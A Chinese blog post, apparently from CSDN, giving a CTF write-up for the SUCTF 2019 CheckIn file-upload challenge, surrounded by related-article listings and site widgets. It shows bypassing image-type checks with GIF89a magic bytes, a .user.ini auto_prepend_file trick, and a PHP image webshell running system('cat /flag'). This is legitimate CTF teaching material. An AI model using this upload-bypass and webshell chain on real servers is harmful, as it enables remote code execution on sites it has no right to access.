【文件上传】buu_[SUCTF 2019]CheckIn

最新推荐文章于 2024-07-17 12:52:39 发布
最新推荐文章于 2024-07-17 12:52:39 发布
阅读量115 收藏
点赞数
分类专栏: CTF_文件上传 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/119972141
版权

知识盲区:

1.后台通过exif_imagetype函数判断一个图像的类型。可以通过给上传脚本加上相应的幻数头字节就可以绕过:

JPG:FF D8 FF E0 00 10 4A 46 49 46

GIF(相当于文本的GIF89a):47 49 46 38 39 61

PNG:89 50 4E 47

2.user.ini

原理:

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)

其中有两个配置,可以用来制造后门:

auto_append_file、auto_prepend_file

指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

这里就很清楚了,

使用方法很简单,直接写在.user.ini中:

auto_prepend_file=test.jpg

那么当我们访问此目录下的任何一个文件时,都会去包含test.jpg

2.首先制作.user.ini文件。前面要加上GIF89a上传,来绕过检测。GIF89a

auto_prepend_file=test.jpg

3.制作图片马名称为test.jpg:

GIF89a

<script language="php">system("cat /flag");</script>

此处注意:有些题会把含“<?”的文件和过滤掉,所以我们就换个方法制作图片马:注意生成的图片马的名称,要和.user.ini中的配置:auto_prepend_file的值相同。

4.上传成功后直接访问upload目录下的index.php

malloc_冲!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传漏洞常用绕过方式
qq_62078839的博客
04-07 1万+
目录 文件上传漏洞原理 常用防御方式和常用防御方式的绕过 一、前端JS检测 二、MIME检测 三、白名单检测 %00截断 0x00截断 四、黑名单绕过 文件拓展名绕过 .htaccess文件绕过 .user.ini.绕过 apache解析漏洞 IIS解析漏洞 Nginx解析漏洞 widows系统文件命名规则的特殊利用 五、文件内容检测 ①文件头检测 ②shell检测 六、条件竞争 靶场实战 文件上传漏洞原理 由于网站在对文件的上传功能中没...
文件上传漏洞
m0_59134926的博客
11-09 269
文件上传
文件包含
weixin_30241919的博客
08-02 128
文件包含函数 (1)require():跟include唯一不同的是,当产生错误时候,include下面继续运行而require停止运行了。(2)include():包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。(3)require_once():只包含一次(4)include_once():这个函数跟include函数作用几乎相同,只是他在导入...
文件上传漏洞详解 一文了解文件上传漏洞
闵行小鱼塘
09-29 2159
刷完了upload-labs,对文件上传漏洞有了些许认识,在此做个小结与记录
[SUCTF 2019]CheckIn 1 学习笔记
weixin_45869407的博客
10-15 390
刚刚做到这道题的时候以为就只是一个简答的文件上传,结果发现自己上传的图片马被拦截了,发现不能有<?符合,然后改成,但最后不知道该怎么弄,无奈自己太菜,只能看大佬writeup(做题不是关键) ...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
6. **I/O操作**:可能涉及到读取传感器数据、网络通信或存储结果,因此会使用到文件流(`fstream`)、套接字(`socket`)或其他I/O库。 7. **第三方库**:C++生态系统中有许多优秀的第三方库,如Boost、Eigen(用于...
cipher_CIPHER_
09-29
压缩包内的"cipher"文件可能是上述文档的源文件、编译后的PDF文档、或者是一系列与Cipher相关的二进制库和头文件。根据这个文件名,我们可以推测这可能是关于Cipher功能的完整开发资源包。 总的来说,理解和掌握...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2196
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
FF D8 FF FE 00 24 47 00转图片
weixin_30339457的博客
03-05 3648
String[]img = "FF D8 FF FE 00 24 47 00 9D 0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 00 40 01 48 00 32 12 0B 51 04 51 04 00 00 FF DB 00 84 00 12 0C 0E 10 0E 0B 12 10 0F 10 14 13 12 15 1B 2D 1...
SAP PLM BAPI_DOCUMENT_CHECKIN2上传原件到DMS系统示例(Originals File)
Catzcoin Official Helper 流落街头干 ABAP
09-29 630
SAP PLM BAPI_DOCUMENT_CHECKIN2上传原件到DMS系统示例(Originals File)
文件上传图片木马执行之[SUCTF 2019]CheckIn1
qq_58970968的博客
04-14 2223
参考博文:BUUCTF__[SUCTF 2019]CheckIn_题解_风过江南乱的博客-CSDN博客 上传一句话木马文件的普通方式都不可以,发现可以上传jpg木马,jpg木马他也进行内容绕过,不能含有<?,但是可以构造其他的,然后还要添加GIF89a进行伪装; 图片木马的制作,不多说;这里上传jpg木马之后,怎么执行里面的木马呢; 目前学到的有两种方法: 1.在apache中,可以用.htacess文件来实现,可这道题也被正则了 2.用.user.ini (知识点在参考里面也有);大概就.
[ctf web][SUCTF 2019]EasyWeb writeup + .htaccess文件上传
ShenZ的博客
09-06 718
知识点 推荐这篇文章!.htaccess tricks总结 超全局变量$_FILES $_FILES["file"]["name"] - 被上传文件的名称 $_FILES["file"]["type"] - 被上传文件的类型 $_FILES["file"]["size"] - 被上传文件的大小,以字节计 $_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称 $_FILES["file"]["error"] - 由文件上传导致的错误代码 绕过exif_imagety
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 332
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
最新发布
12年全栈程序开发
07-17 292
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1305
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
buu crackrtf
09-26
sub_40100F函数是从AAA文件中取出字符和密码进行异或操作,而sub_401005函数则是对数据进行异或操作并生成了一个RTF文件。 根据代码分析,我们可以得到以下步骤来破解这个密码: 1. 首先,我们需要找到AAA文件中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值